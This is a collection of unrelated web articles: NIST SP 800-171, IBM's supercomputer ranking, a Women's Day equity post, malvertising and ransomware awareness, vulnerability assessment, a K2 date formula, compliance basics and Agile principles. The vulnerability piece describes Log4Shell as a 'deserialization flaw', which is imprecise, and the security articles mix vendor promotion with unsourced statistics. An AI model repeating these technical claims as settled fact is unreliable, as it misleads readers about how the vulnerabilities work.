● Access Control
● Awareness Training
● Audit and Accountability
● Configuration Management
● Identification and Authentication
● Incident Response
● Media Protection
● Personnel Security
● Physical Protection
● Risk Assessment
● Security Assessment
● System and Communications Protection
● System and Information Integrity
All of these categories and regulations are to protect controlled unclassified information (CUI). CUI is federal data that is not classified, yet still sensitive. For instance, the U.S. government uses terms on certain sensitive data such as, “for office official use only.” While not classified, this designation means that the information is not meant for public consumption.
NIST SP 800-171 Requirements
Dozens of requirements are outlined across the 14 different categories. For instance, access control requires:
● Maintaining a list of authorized users
● Stating the roles and functions of all users
● Limiting permissions where possible
● Enable auditing
These are just a few of the requirements that fall under access control alone. However, all regulations outlined in NIST SP 800-171 can be summed up in two broad categories — administrative and technical.
whitepaper A Data-Centric Approach to Federal Government Security |
These are the regulations that must be maintained and implemented by individuals, contractors, and executive agencies who deal with CUI. Many of these items include reviewing procedures, reading reports, and reporting vulnerabilities/incidents. To continue with the access control example, affected entities must review audited events annually (according to SP 800-171, control number 3.3.3).
Other measures include physical protections. These requirements include everything from the hardware (e.g., servers) to the buildings in which data is kept. Things as basic as locks on the doors and procedures for handling guests within an establishment are covered in the documents guidance.
With much of the data being in digital form and transmitted over the Internet, there are requirements that denote the need for technological solutions. These technologies are to create the reports, limit the access, and create digital security. Many organizations will have to employ third-party help of their own to create, implement, and comply with these requirements.
A large number of the technical requirements are to monitor, prevent, and warn organizations. Things like digital loss prevention, threat protection, data controls, and many more technical requirements exist in SP 800-171. Below is an image provided by NIST that illustrates such protections.
Let’s quickly break down each component listed in the image:
- Preparation: This would include things like proper onboarding of individuals who will have access to CUI data. Proper implementation of technology and software is a critical piece of preparation.
- Detection & Analysis: Analysis can fall under both administrative and technical requirements. Software can analyze data in order to detect threats and individuals can analyze reports provided by software.
- Containment, Eradication & Recovery: In the event of an incident (breach or loss of data), there are steps to take. These include containing/closing the incident, eradicating the vulnerability that led to the incident and recovering lost data (where possible).
- Post-Incident Activity: Once the incident has been contained, there are certain things that must take place. Agencies must be notified and reports must be filed.
Once all incident activity has been properly handled, lessons learned from errors made can be implemented to better prepare and guard against future threats. From the administrative standpoint, a correction of errors should be made by all parties involved. On the technical side, changes to hardware and software may be necessary.
NIST SP 800-171 is a broad set of guidelines and requirements that aim to ensure the integrity of sensitive federal data. But these regulations are of concern to more than just government entities; it’s imperative that any entity that receives, transmits, stores, or otherwise comes into contact with covered data complies with these requirements. | <urn:uuid:234b77f5-d769-4854-a702-0cca54a05f93> | CC-MAIN-2024-38 | https://www.digitalguardian.com/blog/what-nist-sp-800-171 | 2024-09-09T21:37:59Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651157.15/warc/CC-MAIN-20240909201932-20240909231932-00277.warc.gz | en | 0.93257 | 1,186 | 2.703125 | 3 |
For the tenth consecutive time, an IBM system has achieved the number-one position in the ranking of the world's most powerful supercomputers. The IBM computer built for the "roadrunner project" at Los Alamos National Lab-the first in the world to operate at speeds faster than one quadrillion calculations per second (petaflop)-remains the world speed champion.
IBM has also announced its intent to break the exaflop barrier, and has created a research 'collaboratory' in Dublin, in partnership with the Industrial Development Agency (IDA) of Ireland, which is focused on both achieving exascale computing and making it useful to business. An exaflop is a million trillion calculations per second, which is 1,000 times faster than today's petaflop-class systems.
The latest semi-annual ranking of the World's TOP500 Supercomputer Sites was released during the International Supercomputing Conference in Hamburg, Germany. Results show the IBM system at Los Alamos National lab, which clocked in at 1.105 petaflops, is nearly three times as energy-efficient as the number-two computer to maintain similar levels of petascale computing power. IBM's number-one system performs 444.9 megaflops per watt of energy compared only 154.2 megaflops per watt for the number-two system.
For more information, go here. | <urn:uuid:785488e5-4196-42e4-8744-e3751b397428> | CC-MAIN-2024-38 | https://www.dbta.com/Editorial/News-Flashes/IBM-Continues-to-Lead-TOP500-Supercomputer-List-54953.aspx | 2024-09-11T03:03:22Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651343.80/warc/CC-MAIN-20240911020451-20240911050451-00177.warc.gz | en | 0.937033 | 294 | 3.03125 | 3 |
Today marks the 112th International Women's Day (IWD)
which celebrates the social, economic, cultural and political achievements of women around globe. Along with celebrating the achievements of women, it is an opportunity to highlight the ongoing and evolving struggle for women's rights and equality.
This year’s theme asks us to "Embrace Equity." It's a provocative theme that challenges societies, schools, and workplaces to move beyond the idea of equal opportunity alone and instead create opportunities that are inclusive.
But wait—aren't equity and equality pretty much the same thing?
Understanding the difference between equity and equality
Though equity and equality get used interchangeably, the two concepts have fundamental differences.
Let's start with equality. Societal and workplace reforms that are geared towards equality strive to give individuals or groups the same resources or opportunities. While it sounds nice in principle, policies that promote equality may unintentionally recreate the barriers they aspire to remove.
In the image below, you can see how equality—which provides the same resources to everyone—doesn't translate into fair outcomes. The person who already had the height advantage maintains that advantage, while the shortest spectator still has the same view as before stepping on the box.
Equity, on the other hand, acknowledges that "people don't begin life in the same place, and that circumstances can make it more difficult for people to achieve the same goals." Changing circumstances often takes systemic change. To address inequities through systemic change, societies and workplaces need to recognize the historical and individual circumstances of marginalized groups, including women, people of color, disabled people, LGBTQ+, and other underserved communities.
In the workplace, embracing equity happens when employers "consider the historical and sociopolitical factors that affect opportunities and experiences so that policies, procedures and systems can help meet people's unique needs without one person or group having an unfair advantage over another," according to Gallup.
What does that mean in practice? Gender equity reforms can impact all aspects of work and often requires employers to question things in the workplace that feel banal and traditional.
Some examples of equity related questions include:
- Hiring: Are certain application requirements like "leadership experience" unintentionally excluding women from consideration, since they have fewer opportunities for leadership roles in the first place?
- Compensation: Are raises and promotions favoring certain groups of people?
- Accommodations: Have certain policy changes, such as the end of working from home, disproportionately affected women?
Embracing Equity at HYCU
As a global company, HYCU has a diverse workforce. Luckily, everyone from the executive leadership team on down is committed to embracing equity.
Though we're taking time to celebrate #EmbracingEquity today, it's a year-round job here at HYCU. It's one reason why HYCU was named in the top 50 of America's Best Startup Employers by Forbes.
Equity doesn't mean the same thing for everyone, though. That's why, to celebrate IWD, we asked everyone in the company to answer the question, "What does equity mean to you?"
We'll be posting some of the answers we got in our social media feeds on Twitter, LinkedIn and YouTube. To kick things off, though, be sure to check out this conversation on equity in the workplace between HYCU's CMO, Kelly Hopping, and Theresia Gouw, Founding Partner at Acrew Capital.
Join HYCU today in taking time to recognize the pioneering women who are challenging the norms, breaking down the barriers, and fighting for equitable workplaces across the globe. | <urn:uuid:dfa00387-7bee-4003-aa2f-4f11e470d585> | CC-MAIN-2024-38 | https://www.hycu.com/blog/embracing-equity-international-womens-day-2023 | 2024-09-12T09:13:59Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651440.11/warc/CC-MAIN-20240912074814-20240912104814-00077.warc.gz | en | 0.954692 | 730 | 3.375 | 3 |
Malvertising targets users by adding harmful software to seemingly harmless ads and can lead to serious issues, like ransomware. To protect yourself against this rapidly growing threat, it’s essential to understand how malvertising works and a few strategies to keep it at bay.
Unmasking Malvertising Attacks
Malvertising, a portmanteau of “malicious advertising,” refers to a technique employed by cybercriminals to spread malware through online advertisements. Unlike phishing, which often relies on user negligence, malvertising spreads silently, even when users adhere to cybersecurity best practices.
In a malvertising attack, cybercriminals inject malicious code or malware into seemingly harmless online ads which are then distributed through various online advertising networks and displayed on legitimate websites. Techniques include deceptive ads that lead to legitimate-looking (but bogus) websites, hiding malware within banner ad pixels, and “drive-by-downloads,” in which malware automatically downloads and installs itself.
Malvertising campaigns leverage everyday publishers like Google Ads, AdPlugg, or Propeller Ads to deliver their payloads, allows cybercriminals to target larger audiences. Even reputable publishers cannot guarantee immunity, as malvertisers exploit vulnerabilities in ad networks or legitimately purchase ad space. Almost any website that carries advertising, including trusted sites like the New York Times and NFL could be infected.
The Nexus of Malvertising and Ransomware
While malvertising can deliver various types of nastiness, ransomware is the most prevalent, constituting 70% of malvertising campaigns. These attacks increasingly bypass traditional defenses, utilizing techniques like fileless malware to target system vulnerabilities, and demand proactive measures in any organization’s data protection strategy.
Ransomware is often accompanied by data exfiltration attempts and inflicts significant damage, both financially and reputationally. It’s bad enough that the average ransom payment is around $258,000. Even worse is the total costof an attack: $4.54 million, including investigation, remediation and compensation. In extreme cases, organizations may face closure, exemplified by the 2022 ransomware-induced shuttering of Lincoln College in Illinois.
The US Cybersecurity and Infrastructure Security Agency (CISA) and FBIboth recommend using an ad blocker to intercept malicious code. Do your research though. There are malicious ad blockers out there and some malvertising campaigns are tailored to bypass blockers altogether. Combine that with the fact that some massively popular sites like YouTube require ad blockers disablement and you’re going to take some additional precautions.
Antivirus tools play a crucial role in safeguarding against malware, including malvertising. However, because their detection is signature-based, newer threats, such as fileless malware, which leaves no digital footprint, can render them ineffective. EDR/XDRs have similar gaps, making emerging Defense in Depth strategies like Automated Moving Target Defense (AMTD) critical to a complete security posture.
As browsing habits shift towards mobile devices, malvertising adapts to exploit vulnerabilities within mobile web browsers. Smaller touchscreens increase the likelihood of accidental ad clicks (why do you think they make the Xs so small?). Also, ad blockers and antivirus are installed much less frequently on mobile devices. This is particularly concerning as more and more personal devices connect to business networks.
As always, education and awareness are critical. Be aware of common tactics, such as misleading banner ads or deceptive pop-ups. Avoid clicking on ads from unfamiliar or suspicious websites. Exercise caution when confronted with ads making unrealistic offers or promotions.
(You’re not still using Temu are you?)
How Arms Cyber Can Help
Ransomware attacks present a significant threat due to their ability to evade traditional defenses. At Arms Cyber, we offer an innovative Endpoint Protection Platform (EPP) designed to tackle this challenge head-on. Our solution employs proactive measures such as runtime Moving Target Defenses (MTD), deception techniques, command and behavior analysis, and anti-detonation defenses to reliably detect and prevent ransomware attacks while minimizing false positives. By preventing the disablement of NGAV and EDR solutions and thwarting in-memory manipulation of modern malware, organizations can trust in the effectiveness of their cybersecurity investments without worrying about attacker evasion. | <urn:uuid:5492f39a-5891-4455-a95e-829f284cbb26> | CC-MAIN-2024-38 | https://www.armscyber.com/post/ads-gone-rogue-a-quick-look-at-malvertising | 2024-09-14T18:44:37Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.73/warc/CC-MAIN-20240914161327-20240914191327-00777.warc.gz | en | 0.915217 | 870 | 2.84375 | 3 |
Table of Contents
ToggleVulnerability Report: Unveiling Critical Vulnerabilities in Cybersecurity
In the context of cybersecurity, a vulnerability refers to a weakness or flaw in a system, network, software or application that can be exploited by malicious actors to gain unauthorised access, disrupt normal functioning, steal sensitive information or perform other harmful activities. These vulnerabilities can arise from programming errors, configuration mistakes, design flaws or outdated software versions.
Vulnerability assessment is crucial for identifying & understanding weaknesses in systems & applications. By conducting regular assessments, organisations can proactively identify vulnerabilities, prioritise them based on severity & take appropriate measures to mitigate the associated risks. Reporting vulnerabilities is equally important as it allows for responsible disclosure to relevant parties, such as vendors or developers, who can then work on remediation.
The purpose of this Journal is to shed light on how critical vulnerabilities pose significant risks to cybersecurity. By unveiling & analysing these vulnerabilities, the Journal aims to raise awareness among individuals & organisations about their potential impact.
Understanding Vulnerability Assessment
Vulnerability Assessment [VA] is a systematic process of identifying, quantifying & prioritising vulnerabilities in systems, networks, applications or any digital assets. The objectives of vulnerability assessment include:
- Identifying vulnerabilities: The primary goal is to discover potential weaknesses or flaws that could be exploited by attackers.
- Quantifying risk: Assessing the severity & potential impact of vulnerabilities helps prioritise mitigation efforts based on the level of risk they pose.
- Prioritising remediation: By understanding the risks associated with vulnerabilities, organisations can prioritise their resources to address the most critical vulnerabilities first.
The vulnerability assessment process typically involves the following key steps:
- Asset identification: Identify the assets within the scope of assessment, including systems, networks, applications or devices.
- Vulnerability scanning: Utilise automated tools to scan the identified assets & detect known vulnerabilities. This involves analysing configurations, network services & software versions.
- Vulnerability analysis: Analyse the scan results to determine the severity & potential impact of each identified vulnerability. This step involves assigning a risk rating or score.
Vulnerability assessment employs various tools & techniques to aid in the identification & analysis of vulnerabilities. These may include:
- Vulnerability Scanners: Automated tools that scan networks, systems & applications to detect known vulnerabilities by comparing against a database of known vulnerabilities.
- Penetration Testing: Simulating real-world attacks to identify vulnerabilities that automated scanners may miss. Penetration testing involves manual exploration & exploitation of potential weaknesses.
- Threat Modelling: Evaluating potential threats & vulnerabilities by considering the system architecture, attack vectors & potential impact. This technique helps identify vulnerabilities early in the development process.
- Risk Assessment: Assessing the likelihood & potential impact of vulnerabilities to prioritise remediation efforts based on their risk level.
The Impact of Vulnerabilities
Vulnerabilities can have significant consequences, leading to various detrimental outcomes, including:
- Unauthorised access: Exploited vulnerabilities can provide attackers with unauthorised access to systems, networks or sensitive data, compromising the confidentiality, integrity & availability of the information.
- Data breaches: Vulnerabilities can be leveraged to gain access to sensitive data, resulting in data breaches that can lead to financial loss, reputational damage, legal implications & identity theft.
- Service disruption: Certain vulnerabilities enable attackers to disrupt or disable critical services, causing downtime, operational disruptions & financial losses for organisations.
- Malware & ransomware infections: Exploiting vulnerabilities can facilitate the delivery & execution of malware or ransomware, leading to unauthorised control over systems, data encryption & extortion attempts.
Examples of Real-World Incidents Caused by Vulnerabilities
Numerous real-world incidents have demonstrated the impact of vulnerabilities on organisations & individuals. Some notable examples include:
- WannaCry Ransomware Attack (2017): The WannaCry attack exploited a vulnerability in the Windows operating system known as EternalBlue. It resulted in widespread infections, impacting hundreds of thousands of systems worldwide & causing significant disruptions in various sectors, including healthcare & government.
- Meltdown & Spectre Vulnerabilities (2018): These vulnerabilities affected a wide range of processors, including those from Intel, AMD & ARM. They allowed attackers to access sensitive information stored in memory, potentially compromising passwords, encryption keys & other critical data.
Proactive vulnerability management is crucial for several reasons:
- Risk reduction: By identifying & addressing vulnerabilities before they are exploited, organisations can significantly reduce the risk of data breaches, system compromises & service disruptions.
- Compliance requirements: Many regulatory frameworks & industry standards mandate regular vulnerability assessments & mitigation as part of maintaining compliance & ensuring data protection.
- Reputation & trust: Organisations that proactively manage vulnerabilities demonstrate their commitment to security, fostering trust among customers, clients & stakeholders.
- Cost savings: Proactive vulnerability management can help prevent costly incidents & minimise the financial impact of data breaches, system downtime & recovery efforts.
Recent Vulnerability Discoveries
Below is a list of noteworthy vulnerabilities that have been disclosed in recent times:
- Log4 Shell [CVE-2021-44228]: A critical vulnerability in the Apache Log4 library, widely used for logging in Java-based applications. It allows remote code execution & has raised concerns due to its widespread impact.
- BadAlloc: A series of vulnerabilities discovered in various IoT & embedded devices’ Real-Time Operating Systems [RTOS]. Exploitation could lead to remote code execution, impacting critical systems in sectors such as healthcare, industrial control & aerospace.
Potential Risks & Implications of Each Vulnerability:
- Log4 Shell: The Log4 Shell vulnerability has the potential for widespread impact due to the extensive usage of the Apache Log4 library. Exploitation can lead to remote code execution, enabling attackers to gain control over affected systems & potentially initiate further attacks.
- BadAlloc: The BadAlloc vulnerabilities in RTOS can have significant implications for critical systems. Successful exploitation could lead to Denial-of-Service [DoS] attacks, remote code execution & unauthorised access, impacting sectors relying on embedded devices.
Description of Affected Systems, Software or Technologies:
- Log4 Shell: The Log4 Shell vulnerability affects applications & systems using the Apache Log4 library for logging, which is widely utilised in Java-based applications across different platforms.
- BadAlloc: The BadAlloc vulnerabilities were discovered in various Real-Time Operating Systems [RTOS] used in IoT devices, embedded systems & industrial control systems, potentially affecting critical infrastructure across different industries.
Case Study: Vulnerability Analysis
For this case study, we will focus on the Log4 Shell vulnerability [CVE-2021-44228]. This vulnerability gained significant attention due to its widespread impact & potential for remote code execution in systems utilising the Apache Log4 library.
Step-by-Step Analysis of the Vulnerability’s Discovery & Disclosure
- Discovery: The Log4 Shell vulnerability was initially discovered by security researchers who identified a deserialization flaw in the Apache Log4 library. This flaw allowed remote attackers to execute arbitrary code by sending specially crafted requests.
- Research & Proof-of-Concept: Upon discovery, researchers conducted further investigation & developed a Proof-of-Concept [PoC] to demonstrate the exploitability of the vulnerability.
- Responsible Disclosure: The researchers followed responsible disclosure practices by privately notifying the Apache Software Foundation, the maintainers of the Log4 library, about the vulnerability.
- Public Disclosure: Once a fix or mitigation was available, the vulnerability was publicly disclosed to raise awareness among users of the affected library.
Discussing the Technical Details & Impact of the Vulnerability
The Log4 Shell vulnerability exploited a deserialization flaw in the Apache Log4 library, specifically in its Java Naming & Directory Interface [JNDI] lookup feature. The vulnerability allowed an attacker to include malicious code within a specially crafted request, which, when processed by an application utilising Log4, would trigger remote code execution.
The impact of the Log4 Shell vulnerability was severe due to the widespread usage of the Apache Log4 library in various Java-based applications & systems. By successfully exploiting the vulnerability, an attacker could gain unauthorised control over affected systems, potentially leading to unauthorised access, data breaches, system compromise & the ability to perform additional malicious activities.
Reporting Vulnerabilities Responsibly
When creating & submitting vulnerability reports, it is important to follow best practices to ensure clear communication & facilitate the remediation process. Some recommended practices include:
- Gather sufficient information: Collect all relevant technical details about the vulnerability, including its nature, impact, affected systems & steps to reproduce it.
- Use encrypted communication: Use secure & encrypted communication channels when sharing vulnerability reports. This helps protect the confidentiality of the information & prevents unauthorised access or interception.
- Maintain confidentiality: Unless agreed upon otherwise with the vendor, keep the vulnerability & its details confidential until the agreed-upon disclosure date.
Addressing Vulnerabilities & Mitigation Strategies
Collaboration between security researchers & software vendors is crucial for effective vulnerability remediation. When researchers responsibly disclose vulnerabilities to vendors, it initiates a collaborative process to address the issues.
- Open communication: Establishing clear lines of communication between researchers & vendors enables effective information exchange & collaboration throughout the remediation process.
- Sharing technical details: Researchers should provide vendors with detailed technical information about the vulnerability, including its impact, root cause & potential mitigations.
Organisations can adopt proactive strategies to address vulnerabilities effectively & reduce their exposure to potential threats. Here are some key strategies:
- Regular Vulnerability Assessments: Conducting regular vulnerability assessments helps organisations identify & prioritise vulnerabilities within their systems & infrastructure.
- Patch management: Establish a robust patch management process to ensure that software & systems are regularly updated with the latest security patches.
- Employee training & awareness: Educate employees about the importance of cybersecurity & their role in identifying & reporting potential vulnerabilities
Patch management & regular security updates are vital for maintaining a secure environment & mitigating the risks posed by vulnerabilities. Here’s why they are important:
- Vulnerability mitigation: Security patches & updates often include fixes for known vulnerabilities.
- Protection against exploits: Attackers actively search for & exploit vulnerabilities in software & systems.
- Compliance requirements: Many industry regulations & frameworks require organisations to maintain up-to-date software & security patches.
The Future of Vulnerability Management
Vulnerability management is continually evolving to keep pace with the ever-changing cybersecurity landscape. Some emerging trends & technologies in vulnerability management are
- Threat intelligence integration: Integration of threat intelligence feeds & platforms into vulnerability management systems allows organisations to prioritise vulnerabilities based on real-time threat intelligence data.
- DevSecOps & sutomation: The integration of security into the DevOps process, known as DevSecOps, promotes the automation of vulnerability management tasks.
Looking ahead, several predictions can be made for the future of vulnerability assessment & reporting:
- Increased automation & machine learning: Automation & machine learning techniques will play a more prominent role in vulnerability assessment.
- Integration with Security Orchestration, Automation & Response [SOAR]: Vulnerability management solutions will integrate with SOAR platforms to streamline incident response workflows.
Artificial Intelligence [AI] & automation will play a crucial role in vulnerability identification. Some key aspects include:
- Enhanced vulnerability scanning: AI-powered vulnerability scanners can analyse vast amounts of data, identify patterns & detect vulnerabilities that may be challenging for traditional scanners to discover.
- Continuous monitoring & adaptive defence: AI can enable real-time monitoring of systems & networks, continuously analysing data to detect & respond to emerging vulnerabilities & threats.
Vulnerability assessment & reporting play a crucial role in maintaining robust cybersecurity. By conducting vulnerability assessments, organisations can identify & prioritise vulnerabilities, allowing them to proactively address security weaknesses.
Addressing vulnerabilities requires a collective effort from individuals, organisations & the broader cybersecurity community. It is essential to foster collaboration between security researchers, vendors & users to share knowledge, exchange information & collectively work towards identifying & remediating vulnerabilities.
Cybersecurity awareness & action are paramount in safeguarding against vulnerabilities & cyber threats. It is crucial to inspire individuals & organisations to prioritise cybersecurity by investing in education, training & awareness programs. By promoting best practices, encouraging responsible behaviour & staying updated on emerging threats, we can build a resilient cybersecurity ecosystem.
What is a Vulnerability Report?
A Vulnerability Report is a document that provides information about a security vulnerability in a system, software or infrastructure, including its impact, severity & potential mitigations.
What should a Vulnerability Report include?
A Vulnerability Report should include details about the vulnerability, such as its description, impact, affected systems or software versions, steps to reproduce & recommendations for remediation.
What does a Vulnerability Report look like?
A Vulnerability Report typically follows a structured format, including sections such as an executive summary, vulnerability description, impact analysis, proof of concept & recommended actions for remediation.
What are the 4 stages of vulnerability?
The four stages of vulnerability are identification, classification, prioritisation & remediation. | <urn:uuid:ef07e5f1-e535-4245-82a3-408e1593e375> | CC-MAIN-2024-38 | https://www.neumetric.com/vulnerability-report/ | 2024-09-14T17:32:58Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.73/warc/CC-MAIN-20240914161327-20240914191327-00777.warc.gz | en | 0.899856 | 2,730 | 3.25 | 3 |
From Date Expression: Add Days ( Start Of Month ( Subtract Days ( Start Of Month ( Current Date ) , 1 ) ) , 22 )
To Date Expression: Add Days ( Start Of Month ( Current Date ) , 21 )
In my example I have used a calendar control as this made testing easier, for your purpose just substitute the calendar control for the current date
I have broken the problem into 3 steps.
- Calculate the 25th of this month
- Calculate the 25th of last month
- Decide which one is appropriate
Below are the detailed steps.
1. Calculate 25th of this month
We calculate the start of this month using the Start Of Month function.
Then Add 24 days to get to the 25th day of the month using the Add Days function
When working with expressions I find it easiest to build them from the outer most function inwards.
Start with Add Days
Then drag Start of Month into first the input field
Lastly drag the date into the input for the Start of Month function (substitute current date for your solution).
2. Calculate the 25th day of last Month (read this one a couple of times if you need to)
With the functions we have available my calculations are broken down below.
Start of this month (Calendar) - 1 Day = End of Last Month
Start of Month (End of Last Month) = Start of Last Month
Start of Last Month + 24 Days = 25th day of Last Month
I used Add Days and passed in -1, but this can be replaced by Subtract Days instead.
Taking the same outer most to Inner most approach as before.
Add 24 days
Calculate the Start of Last Month
By subtracting 1 day
From the Start of This Month
Substitute Current Date for your solution
3 Decide which date to use
Now base on the current date choose which value to use using logical operators
Below are the Expressions
Below are tests showing the expressions working.
I hope this helps | <urn:uuid:064472c9-f6bc-47fc-929c-953c734d302d> | CC-MAIN-2024-38 | https://community.nintex.com/k2-cloud-12/calculate-the-25th-day-of-every-month-based-on-the-current-date-60615 | 2024-09-15T22:44:13Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651668.26/warc/CC-MAIN-20240915220324-20240916010324-00677.warc.gz | en | 0.867119 | 426 | 2.9375 | 3 |
What is Cyber Security Compliance?
Cyber security compliance refers to an organisation’s adherence to laws, regulations, and standards to protect its digital information and systems from cyber threats. Cyber security compliance is attained by implementing security controls, policies, and other measures to ensure the integrity, confidentiality, and availability of data.
While certain government organisations and industries may have specific standards that organisations must comply with, there are also universal standards and frameworks that organisations of all sizes can use to bolster their information security.
Benefits of Cyber Security Compliance
No matter what your reason for wanting to achieve cyber security compliance may be, organisations that do comply with robust cyber security standards realise a wide range of benefits. Some of these benefits include:
- Risk Reduction – Compliance minimises the likelihood of data breaches and cyber attacks by implementing robust security measures.
- Legal Protection – Organisations that comply with legal and industry-recognised standards can often avoid legal penalties and fines when breaches occur.
- Reputational Enhancement – Compliant organisations can build trust with customers, partners, and stakeholders, enhancing their overall reputation.
- Operational Continuity – Compliance ensures business operations remain uninterrupted by preventing and effectively responding to cyber threat events and incidences.
- Competitive Advantage – Organisations that demonstrate a commitment to security can differentiate themselves in the market and attract more customers.
Types of Data Subject to Cyber Security Compliance
When data breaches do occur, there is no shortage of sensitive data that can be compromised. As such, many cyber security laws and compliance standards have been developed to protect certain types of sensitive data. This can include:
Personally Identifiable Information (PII)
PII refers to any data that can be used to identify a specific individual, either on its own or when combined with other information. PII might include details like names, social security numbers, addresses, phone numbers, email addresses, and biometric data. Loss of PII can lead to identity theft, fraud, and privacy violations.
Protected Health Information (PHI)
PHI refers to any information in a medical record or designated for use in the healthcare process that can be used to identify an individual and that was created, used, or disclosed in the course of providing a healthcare service. PHI might include demographic data, medical histories, test results, insurance information, and other data collected by a healthcare provider.
Financial information refers to data surrounding an individual’s or organisation’s finances, such as credit card numbers, CVVs, bank account information, and credit ratings.
Other Sensitive Data
Any sensitive information that is confidential, such as an email address, IP address, a person’s race or religion, and marital status.
How to Get Started with Cyber Security Compliance
Common cyber security frameworks, such as ISO 27001 and NIST Cyber Security Framework, include processes for assessing and bolstering your current information security posture. With them in mind, here are some steps organisations can take to begin their compliance journey.
1. Identify their data type and subsequent requirements
Organisations first need to understand which type of data they’re processing and storing and whether or not any legal regulations exist to protect such data.
2. Build a compliance team
When implementing a robust compliance program, it is essential to have a compliance team in place, with departments across the organisation contributing.
3. Perform risk and vulnerability analysis
This step is integral to comply with pretty much every significant cyber security compliance requirement. It is crucial to identifying security issues within an organisation as well as existing security controls.
4. Develop controls to mitigate risks
The next step is to develop the necessary controls to eliminate existing security risks and mitigate damage during future threat events. Controls include policies and processes for preventing, detecting, and eliminating threats.
5. Monitor and respond to threats
Organisations, finally, must continuously monitor their compliance program to ensure it meets developing rules and regulations. This also helps to ensure ongoing threat mitigation by updating policies and procedures to meet an evolving threat landscape.
Types of Cyber Security Compliance Frameworks
As mentioned, there are a number of industry-specific and agnostic cyber security compliance frameworks. Some of the most notable include:
- Health Insurance Portability and Accountability Act (HIPAA)
- General Data Protection Regulation (GDPR)
- Cybersecurity Maturity Model Certification (CMMC)
Unsure about which compliance framework is right for your organisation? Get in touch with us today to learn more about how you can maintain cyber security compliance. | <urn:uuid:36a80d95-cd18-4ff9-8eb4-b4b69231ff27> | CC-MAIN-2024-38 | https://hicomply.com/cyber-essentials/cyber-security-compliance | 2024-09-19T18:23:20Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652055.62/warc/CC-MAIN-20240919162032-20240919192032-00377.warc.gz | en | 0.926477 | 923 | 3.09375 | 3 |
This article will explore what is Agile, which is one of the most popular and exciting product development approaches in use today. We will also uncover what is Agile methodology, so you can apply the thinking to benefit your own organization.
Table of Contents
ToggleAgile has transformed how products of many kinds are developed and delivered. The time between releasing new products is now a couple of weeks or even less, whereas previously it was measured in months.
Agile development will bring early delivery of products, encourage a culture of continuous improvement, and provide the ability to support making rapid and flexible changes to meet the needs of your organization.
Although the Agile definition was initially aimed at developing software, sectors outside of IT have asked “what is Agile” and now embrace Agile thinking, for example, by applying the approaches to planning projects and creating new products such as automobiles.
It is now the most commonly used approach globally for developing anything, even extending to the development of new processes, new organizational structures, and new ways of working.
This way of doing things encourages collaboration between product development teams and the customer, delivering products in a flexible and nimble way.
However, it does require an open mind that is receptive to being guided by ideas and concepts instead of rigid frameworks and processes.
If you look up the term in a dictionary, you will find that it is defined as the ability to move quickly and easily, with grace, suppleness, and dexterity.
The opposite is something that is clumsy, inflexible, and slow to operate. That is what characterized the historic practices for software development, which were heavy with documentation and management control.
In contrast, today’s software development methodologies provide early delivery and continuous improvement of Agile software, with the ability to support rapid and flexible changes to the requirements.
Navigating through any Agile software development life cycle requires an understanding of the concepts. These were first set out in the Agile Manifesto.
This was first published in 2001 along with the Twelve Principles. Taken together, these defined what differentiates an Agile methodology.
This new approach for Agile programming provides a way of thinking and a set of values that promotes a fast and nimble way to work, always focusing on meeting user requirements efficiently and effectively.
There is an emphasis on efficient production, collaboration, communication, and rapid development of smaller sets of features under the guidance of an overall plan.
The Agile scrum methodology was one of the earliest Agile software development methodologies. In this approach, a small team, known as a scrum, develop software in short time-boxed iterations.
An Agile methodology scrum is a self-sufficient, self-determining team. In the scrum Agile methodology, there is no manager that directs the team; instead, the team is empowered to develop solutions, ways of working, and resolution to issues themselves.
This common theme of self-determination is shared across all the different Agile software development methodologies.
Because this concept is based on a set of principles and values, there are many different approaches to development that can claim to have an Agile meaning.
Scrum Agile has been around the longest and is still the most widely adopted example of an Agile process flow, but several other more recent methodologies have been created using the same Agile basics.
For example, Kanban and DevOps are both Agile methodologies that embrace the principles and values set out in the Manifesto and the Twelve Principles, and hence share the same Agile methodology meaning.
To align with the authentic meaning, any methodology must visibly embrace the Agile principles. This is how the Manifesto defines the meaning of Agile:
We are uncovering better ways of developing
software by doing it and helping others do it.
Through this work we have come to value:
Individuals and interactions over processes and tools
Working software over comprehensive documentation
Customer collaboration over contract negotiation
Responding to change over following a plan
That is, while there is value in the items on the right, we value the items on the left more.
Principles of Agile
The definition of Agile is based on the Twelve Principles of Agile Software, published in 2001 to support the Manifesto.
Taken together, these two artifacts provide the guide for all of the individual methodologies that have come to be known as ‘The Agile Movement.’ Together they describe a culture in which change is welcome, and the customer is the focus of the work.
The Twelve Principles Are:
We follow these principles:
- Our highest priority is to satisfy the customer through early and continuous delivery of valuable software.
- Welcome changing requirements, even late in development. Agile processes harness change for the customer’s competitive advantage.
- Deliver working software frequently, from a couple of weeks to a couple of months, with a preference to the shorter timescale.
- Business people and developers must work together daily throughout the project.
- Build projects around motivated individuals. Give them the environment and support they need, and trust them to get the job done.
- The most efficient and effective method of conveying information to and within a development team is face-to-face conversation.
- Working software is the primary measure of progress.
- Agile processes promote sustainable development. The sponsors, developers, and users should be able to maintain a constant pace indefinitely.
- Continuous attention to technical excellence and good design enhances agility.
- Simplicity–the art of maximizing the amount of work not done–is essential.
- The best architectures, requirements, and designs emerge from self-organizing teams.
- At regular intervals, the team reflects on how to become more effective, then tunes and adjusts its behavior accordingly.
These Principles Can Drive the Following Beneficial Behaviors:
- Customer satisfaction through early and continuous software delivery – Customers of Agile methods are happier when they receive working software at regular intervals, rather than waiting extended periods of time between releases.
- Accommodate changing requirements throughout the development process – The ability to avoid delays when a requirement or feature request changes is a key feature.
- Frequent delivery of working software – the team operates in software sprints or iterations that ensure regular delivery of working software.
- Collaboration between the business stakeholders and developers throughout the project – Better decisions are made when the business and technical team are aligned.
- Support, trust, and motivate the people involved – self-determining teams are more likely to be motivated and hence deliver their best work.
- Enable face-to-face interactions – Communication is more successful when development teams are co-located.
- Working software is the primary measure of progress – Delivering functional software to the customer is the ultimate factor that measures progress.
- Agile processes to support a consistent development pace – Teams establish a repeatable and maintainable speed at which they can deliver working software, and they repeat it with each release.
